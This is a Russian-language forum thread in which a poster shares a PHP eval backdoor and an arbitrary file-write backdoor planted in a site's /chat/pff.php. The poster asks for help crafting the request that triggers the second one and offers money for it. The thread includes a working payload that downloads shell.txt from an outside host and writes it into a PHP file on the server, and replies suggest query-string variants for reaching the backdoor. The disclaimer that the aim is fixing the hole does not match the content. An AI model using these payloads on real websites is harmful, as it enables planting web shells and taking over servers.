Всем привет! кто знаком с кодом:
---
1) eval($_GET['shell']);
???
---
Вызывается от так:
******
2) ?shell=$file=fopen('название-файла.php',"a+"fwrite($file,file_get_contents('http://от-куда-берем-файл.ру/shell.txt'));fclose($file);
*******
Это если код "1" прописать в индексе..
а у меня ворос с таким кодом:
=======
3) [code]if($_POST['lons']!='')
{$gast=fopen($_POST
['poin'],"w"fputs($gast, $_POST
['vags']);fclose($gast);}[/code]
=======
Который прописывается НЕ в индексе а в файле который в папке: (/chat/pff.php)
ВОПРОС: если файл в папке то и вызов дыры должен быть другим, верно? кто подскажет верный путь отблагодарю 100.рублями! ))
P.S информация в целях ознакомления и устранения дыры.
Первый код то шелл
Добавлено 24.08.13 в 15:11:11:
Сейчас код попробую написать
то язва для его заливки.. с тем то понятно.. меня интересует если этот код не в индексе а в чате то какой должен быть вызов?
я много вариантов проверил но ничего не вышло.
Добавлено 24.08.13 в 15:16:04:
ну так что, кто поможет?
3 варианта chat.php?lons chat.php?poin chat.php?gast chat.php?vags
Там где названия файла .php попробуй написать так
/chat/pff.php
или зайди в чат и пропиши названия файла.
пробывал(( не работает.. да и вывод файлов у меня так идет: сите.ру/?chat
Или chat.php?gast=пост переменные
а прямой доступ к папке Запрещен (но код работает 100%) главное правильный запрос.
сите.ру/?chat&gast=lala